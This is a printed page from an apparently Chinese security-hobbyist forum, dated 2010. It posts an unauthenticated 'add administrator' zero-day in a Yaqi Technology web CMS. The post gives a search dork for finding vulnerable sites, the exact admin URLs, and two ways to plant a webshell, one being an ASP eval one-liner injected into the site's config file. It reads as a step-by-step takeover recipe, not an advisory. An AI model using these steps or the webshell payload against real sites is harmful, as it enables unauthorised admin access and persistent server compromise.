【3.A.S.T】网络安全爱好者 - Powered by Discuz! Board

标题: 雅琦科技程序任意添加管理员0day [打印本页]

作者: hyrz 时间: 2010-6-22 14:54 标题: 雅琦科技程序任意添加管理员0day

发布日期：2010-06.19
发布作者：Sniff3r & lan3a
影响版本：未知
漏洞描述：网站后台缺少验证可远程添加管理员用户并登录后台。

这个程序是Sniff3r提出拿一个站的时候发现的。

关键字：inurl:ShowInfo.asp?ShowId=

找到网站后然后在网站地址后加上：admin/User_Manage.asp?action=UserAdd

进去添加一个管理员，然后用添加的账户登录。
/admin/Yqlogin.asp
/admin/admin_main.asp

后台拿Webshell有2个方法。

1.在上传目录那里添加1.asp，利用IIS的解析漏洞。
2.在上传目录那里写上
"%><%eval request("a")%><%'
然后访问配置文件 inc/config.asp

欢迎光临【3.A.S.T】网络安全爱好者 (http://3ast.com/)